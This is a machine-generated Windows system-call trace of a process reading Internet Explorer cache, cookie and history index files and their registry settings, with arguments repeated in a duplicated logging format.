 03328   456   NtQueryValueKey  (412,  (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (412, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) }, 30, ) == 0x0
 03329   456   NtQueryValueKey  (412,  (412, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (412, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 03330   456   NtClose  (412, ... ) == 0x0
 03331   456   NtClose  (408, ... ) == 0x0
 03332   456   NtClose  (400, ... ) == 0x0
 03333   456   NtClose  (404, ... ) == 0x0
 03334   456   NtClose  (396, ... ) == 0x0
 03335   456   NtOpenMutant  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "_!MSFTHISTORY!_"}, ... 396, ) }, ... 396, ) == 0x0
 03336   456   NtOpenMutant  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "c:!documents and settings!sri-user!local settings!temporary internet files!content.ie5!"}, ... 404, ) }, ... 404, ) == 0x0
 03337   456   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 03338   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\Content.IE5\"}, 3, 8388641, ... 400, {status=0x0, info=1}, ) }, 3, 8388641, ... 400, {status=0x0, info=1}, ) == 0x0
 03339   456   NtQueryVolumeInformationFile  (400, 1237168, 24, Size, ... {status=0x0, info=24}, ) == 0x0
 03340   456   NtClose  (400, ... ) == 0x0
 03341   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 8388641, ... 400, {status=0x0, info=1}, ) }, 3, 8388641, ... 400, {status=0x0, info=1}, ) == 0x0
 03342   456   NtQueryVolumeInformationFile  (400, 1237192, 24, Size, ... {status=0x0, info=24}, ) == 0x0
 03343   456   NtClose  (400, ... ) == 0x0
 03344   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\Content.IE5\"}, 1237520, ... ) }, 1237520, ... ) == 0x0
 03345   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\Content.IE5\"}, 7, 2113568, ... 400, {status=0x0, info=1}, ) }, 7, 2113568, ... 400, {status=0x0, info=1}, ) == 0x0
 03346   456   NtSetInformationFile  (400, 1237496, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03347   456   NtClose  (400, ... ) == 0x0
 03348   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 1493616, 1237512,  (0xc0100080, {24, 0, 0x40, 1493616, 1237512, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\Content.IE5\index.dat"}, 0x0, 0, 3, 3, 2144, 0, 0, ... 400, {status=0x0, info=1}, ) }, 0x0, 0, 3, 3, 2144, 0, 0, ... 400, {status=0x0, info=1}, ) == 0x0
 03349   456   NtSetInformationFile  (400, 1237564, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03350   456   NtQueryInformationFile  (400, 1237564, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03351   456   NtClose  (400, ... ) == 0x0
 03352   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 1493616, 1237496,  (0xc0100080, {24, 0, 0x40, 1493616, 1237496, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\Content.IE5\index.dat"}, 0x0, 0, 3, 3, 2144, 0, 0, ... 400, {status=0x0, info=1}, ) }, 0x0, 0, 3, 3, 2144, 0, 0, ... 400, {status=0x0, info=1}, ) == 0x0
 03353   456   NtAllocateVirtualMemory  (-1, 1495040, 0, 4096, 4096, 4, ... 1495040, 4096, ) == 0x0
 03354   456   NtOpenSection  (0x2, {24, 64, 0x0, 0, 0,  (0x2, {24, 64, 0x0, 0, 0, "C:_Documents and Settings_SRI-user_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768"}, ... 408, ) }, ... 408, ) == 0x0
 03355   456   NtMapViewOfSection  (408, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0x1050000), {0, 0}, 32768, ) == 0x0
 03356   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03357   456   NtOpenMutant  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "c:!documents and settings!sri-user!cookies!"}, ... 412, ) }, ... 412, ) == 0x0
 03358   456   NtWaitForSingleObject  (412, 0, 0x0, ... ) == 0x0
 03359   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Cookies\"}, 3, 8388641, ... 420, {status=0x0, info=1}, ) }, 3, 8388641, ... 420, {status=0x0, info=1}, ) == 0x0
 03360   456   NtQueryVolumeInformationFile  (420, 1237168, 24, Size, ... {status=0x0, info=24}, ) == 0x0
 03361   456   NtClose  (420, ... ) == 0x0
 03362   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 8388641, ... 420, {status=0x0, info=1}, ) }, 3, 8388641, ... 420, {status=0x0, info=1}, ) == 0x0
 03363   456   NtQueryVolumeInformationFile  (420, 1237192, 24, Size, ... {status=0x0, info=24}, ) == 0x0
 03364   456   NtClose  (420, ... ) == 0x0
 03365   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Cookies\"}, 1237520, ... ) }, 1237520, ... ) == 0x0
 03366   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Cookies\"}, 7, 2113568, ... 420, {status=0x0, info=1}, ) }, 7, 2113568, ... 420, {status=0x0, info=1}, ) == 0x0
 03367   456   NtSetInformationFile  (420, 1237496, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03368   456   NtClose  (420, ... ) == 0x0
 03369   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 1493616, 1237512,  (0xc0100080, {24, 0, 0x40, 1493616, 1237512, "\??\C:\Documents and Settings\SRI-user\Cookies\index.dat"}, 0x0, 0, 3, 3, 2144, 0, 0, ... 420, {status=0x0, info=1}, ) }, 0x0, 0, 3, 3, 2144, 0, 0, ... 420, {status=0x0, info=1}, ) == 0x0
 03370   456   NtSetInformationFile  (420, 1237564, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03371   456   NtQueryInformationFile  (420, 1237564, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03372   456   NtClose  (420, ... ) == 0x0
 03373   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 1493616, 1237496,  (0xc0100080, {24, 0, 0x40, 1493616, 1237496, "\??\C:\Documents and Settings\SRI-user\Cookies\index.dat"}, 0x0, 0, 3, 3, 2144, 0, 0, ... 420, {status=0x0, info=1}, ) }, 0x0, 0, 3, 3, 2144, 0, 0, ... 420, {status=0x0, info=1}, ) == 0x0
 03374   456   NtOpenSection  (0x2, {24, 64, 0x0, 0, 0,  (0x2, {24, 64, 0x0, 0, 0, "C:_Documents and Settings_SRI-user_Cookies_index.dat_16384"}, ... 444, ) }, ... 444, ) == 0x0
 03375   456   NtMapViewOfSection  (444, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0x1060000), {0, 0}, 16384, ) == 0x0
 03376   456   NtReleaseMutant  (412, ... 0x0, ) == 0x0
 03377   456   NtOpenMutant  (0x100000, {24, 64, 0x0, 0, 0,  (0x100000, {24, 64, 0x0, 0, 0, "c:!documents and settings!sri-user!local settings!history!history.ie5!"}, ... 424, ) }, ... 424, ) == 0x0
 03378   456   NtWaitForSingleObject  (424, 0, 0x0, ... ) == 0x0
 03379   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\History.IE5\"}, 3, 8388641, ... 428, {status=0x0, info=1}, ) }, 3, 8388641, ... 428, {status=0x0, info=1}, ) == 0x0
 03380   456   NtQueryVolumeInformationFile  (428, 1237168, 24, Size, ... {status=0x0, info=24}, ) == 0x0
 03381   456   NtClose  (428, ... ) == 0x0
 03382   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 8388641, ... 428, {status=0x0, info=1}, ) }, 3, 8388641, ... 428, {status=0x0, info=1}, ) == 0x0
 03383   456   NtQueryVolumeInformationFile  (428, 1237192, 24, Size, ... {status=0x0, info=24}, ) == 0x0
 03384   456   NtClose  (428, ... ) == 0x0
 03385   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\History.IE5\"}, 1237520, ... ) }, 1237520, ... ) == 0x0
 03386   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\History.IE5\"}, 7, 2113568, ... 428, {status=0x0, info=1}, ) }, 7, 2113568, ... 428, {status=0x0, info=1}, ) == 0x0
 03387   456   NtSetInformationFile  (428, 1237496, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03388   456   NtClose  (428, ... ) == 0x0
 03389   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 1493616, 1237512,  (0xc0100080, {24, 0, 0x40, 1493616, 1237512, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\History.IE5\index.dat"}, 0x0, 0, 3, 3, 2144, 0, 0, ... 428, {status=0x0, info=1}, ) }, 0x0, 0, 3, 3, 2144, 0, 0, ... 428, {status=0x0, info=1}, ) == 0x0
 03390   456   NtSetInformationFile  (428, 1237564, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03391   456   NtQueryInformationFile  (428, 1237564, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03392   456   NtClose  (428, ... ) == 0x0
 03393   456   NtCreateFile  (0xc0100080, {24, 0, 0x40, 1493616, 1237496,  (0xc0100080, {24, 0, 0x40, 1493616, 1237496, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\History.IE5\index.dat"}, 0x0, 0, 3, 3, 2144, 0, 0, ... 428, {status=0x0, info=1}, ) }, 0x0, 0, 3, 3, 2144, 0, 0, ... 428, {status=0x0, info=1}, ) == 0x0
 03394   456   NtOpenSection  (0x2, {24, 64, 0x0, 0, 0,  (0x2, {24, 64, 0x0, 0, 0, "C:_Documents and Settings_SRI-user_Local Settings_History_History.IE5_index.dat_32768"}, ... 432, ) }, ... 432, ) == 0x0
 03395   456   NtMapViewOfSection  (432, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0x1480000), {0, 0}, 32768, ) == 0x0
 03396   456   NtReleaseMutant  (424, ... 0x0, ) == 0x0
 03397   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\Content.IE5\"}, 1237576, ... ) }, 1237576, ... ) == 0x0
 03398   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\Content.IE5\"}, 7, 2113568, ... 436, {status=0x0, info=1}, ) }, 7, 2113568, ... 436, {status=0x0, info=1}, ) == 0x0
 03399   456   NtSetInformationFile  (436, 1237552, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03400   456   NtClose  (436, ... ) == 0x0
 03401   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini"}, 1237576, ... ) }, 1237576, ... ) == 0x0
 03402   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\History.IE5\"}, 1237576, ... ) }, 1237576, ... ) == 0x0
 03403   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\History.IE5\"}, 7, 2113568, ... 436, {status=0x0, info=1}, ) }, 7, 2113568, ... 436, {status=0x0, info=1}, ) == 0x0
 03404   456   NtSetInformationFile  (436, 1237552, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 03405   456   NtClose  (436, ... ) == 0x0
 03406   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\History\History.IE5\desktop.ini"}, 1237576, ... ) }, 1237576, ... ) == 0x0
 03407   456   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
 03408   456   NtQueryInformationFile  (400, 1235960, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 03409   456   NtReleaseMutant  (404, ... 0x0, ) == 0x0
 03410   456   NtOpenKey  (0xf, {24, 52, 0x40, 0, 0,  (0xf, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 436, ) }, ... 436, ) == 0x0
 03411   456   NtOpenKey  (0xf, {24, 436, 0x40, 0, 0,  (0xf, {24, 436, 0x40, 0, 0, "Extensible Cache"}, ... 440, ) }, ... 440, ) == 0x0
 03412   456   NtClose  (436, ... ) == 0x0
 03413   456   NtWaitForSingleObject  (396, 0, {-600000000, -1}, ... ) == 0x0
 03414   456   NtEnumerateKey  (440, 0, Basic, 288, ... {LastWrite={0x89210de2,0x1c79d95}, TitleIdx=0, Name= (440, 0, Basic, 288, ... {LastWrite={0x89210de2,0x1c79d95}, TitleIdx=0, Name="MSHist012007051420070521"}, 64, ) }, 64, ) == 0x0
 03415   456   NtOpenKey  (0xf, {24, 440, 0x40, 0, 0,  (0xf, {24, 440, 0x40, 0, 0, "MSHist012007051420070521"}, ... 436, ) }, ... 436, ) == 0x0
 03416   456   NtQueryValueKey  (436,  (436, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03417   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03418   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\01\04\02\00\00\07\00\05\02\01\0\\0\0\0"}, 162, ) , Partial, 162, ... TitleIdx=0, Type=2, Data= (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\01\04\02\00\00\07\00\05\02\01\0\\0\0\0"}, 162, ) }, 162, ) == 0x0
 03419   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03420   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\01\04\02\00\00\07\00\05\02\01\0\\0\0\0"}, 162, ) , Partial, 162, ... TitleIdx=0, Type=2, Data= (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\01\04\02\00\00\07\00\05\02\01\0\\0\0\0"}, 162, ) }, 162, ) == 0x0
 03421   456   NtQueryValueKey  (436,  (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\01\04\02\00\00\07\00\05\02\01\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\01\04\02\00\00\07\00\05\02\01\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0
 03422   456   NtQueryValueKey  (436,  (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\01\04\02\00\00\07\00\05\02\01\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\01\04\02\00\00\07\00\05\02\01\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0
 03423   456   NtQueryValueKey  (436,  (436, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 03424   456   NtQueryValueKey  (436,  (436, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) }, 16, ) == 0x0
 03425   456   NtClose  (436, ... ) == 0x0
 03426   456   NtEnumerateKey  (440, 1, Basic, 288, ... {LastWrite={0xfe4bb184,0x1c7a3a9}, TitleIdx=0, Name= (440, 1, Basic, 288, ... {LastWrite={0xfe4bb184,0x1c7a3a9}, TitleIdx=0, Name="MSHist012007052120070528"}, 64, ) }, 64, ) == 0x0
 03427   456   NtOpenKey  (0xf, {24, 440, 0x40, 0, 0,  (0xf, {24, 440, 0x40, 0, 0, "MSHist012007052120070528"}, ... 436, ) }, ... 436, ) == 0x0
 03428   456   NtQueryValueKey  (436,  (436, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03429   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03430   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\02\01\02\00\00\07\00\05\02\08\0\\0\0\0"}, 162, ) , Partial, 162, ... TitleIdx=0, Type=2, Data= (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\02\01\02\00\00\07\00\05\02\08\0\\0\0\0"}, 162, ) }, 162, ) == 0x0
 03431   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03432   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\02\01\02\00\00\07\00\05\02\08\0\\0\0\0"}, 162, ) , Partial, 162, ... TitleIdx=0, Type=2, Data= (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\02\01\02\00\00\07\00\05\02\08\0\\0\0\0"}, 162, ) }, 162, ) == 0x0
 03433   456   NtQueryValueKey  (436,  (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\02\01\02\00\00\07\00\05\02\08\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\02\01\02\00\00\07\00\05\02\08\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0
 03434   456   NtQueryValueKey  (436,  (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\02\01\02\00\00\07\00\05\02\08\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\02\01\02\00\00\07\00\05\02\08\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0
 03435   456   NtQueryValueKey  (436,  (436, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 03436   456   NtQueryValueKey  (436,  (436, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) }, 16, ) == 0x0
 03437   456   NtClose  (436, ... ) == 0x0
 03438   456   NtEnumerateKey  (440, 2, Basic, 288, ... {LastWrite={0xfe4e13de,0x1c7a3a9}, TitleIdx=0, Name= (440, 2, Basic, 288, ... {LastWrite={0xfe4e13de,0x1c7a3a9}, TitleIdx=0, Name="MSHist012007053120070601"}, 64, ) }, 64, ) == 0x0
 03439   456   NtOpenKey  (0xf, {24, 440, 0x40, 0, 0,  (0xf, {24, 440, 0x40, 0, 0, "MSHist012007053120070601"}, ... 436, ) }, ... 436, ) == 0x0
 03440   456   NtQueryValueKey  (436,  (436, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 03441   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03442   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\03\01\02\00\00\07\00\06\00\01\0\\0\0\0"}, 162, ) , Partial, 162, ... TitleIdx=0, Type=2, Data= (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\03\01\02\00\00\07\00\06\00\01\0\\0\0\0"}, 162, ) }, 162, ) == 0x0
 03443   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03444   456   NtQueryValueKey  (436,  (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\03\01\02\00\00\07\00\06\00\01\0\\0\0\0"}, 162, ) , Partial, 162, ... TitleIdx=0, Type=2, Data= (436, "CachePath", Partial, 162, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\07\00\05\03\01\02\00\00\07\00\06\00\01\0\\0\0\0"}, 162, ) }, 162, ) == 0x0
 03445   456   NtQueryValueKey  (436,  (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\03\01\02\00\00\07\00\06\00\01\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\03\01\02\00\00\07\00\06\00\01\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0
 03446   456   NtQueryValueKey  (436,  (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\03\01\02\00\00\07\00\06\00\01\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (436, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\07\00\05\03\01\02\00\00\07\00\06\00\01\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0
 03447   456   NtQueryValueKey  (436,  (436, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 03448   456   NtQueryValueKey  (436,  (436, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (436, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) }, 16, ) == 0x0
 03449   456   NtClose  (436, ... ) == 0x0
 03450   456   NtEnumerateKey  (440, 3, Basic, 288, ... ) == STATUS_NO_MORE_ENTRIES
 03451   456   NtReleaseMutant  (396, ... 0x0, ) == 0x0
 03452   456   NtClose  (440, ... ) == 0x0
 03453   456   NtWaitForSingleObject  (404, 0, 0x0, ... ) == 0x0
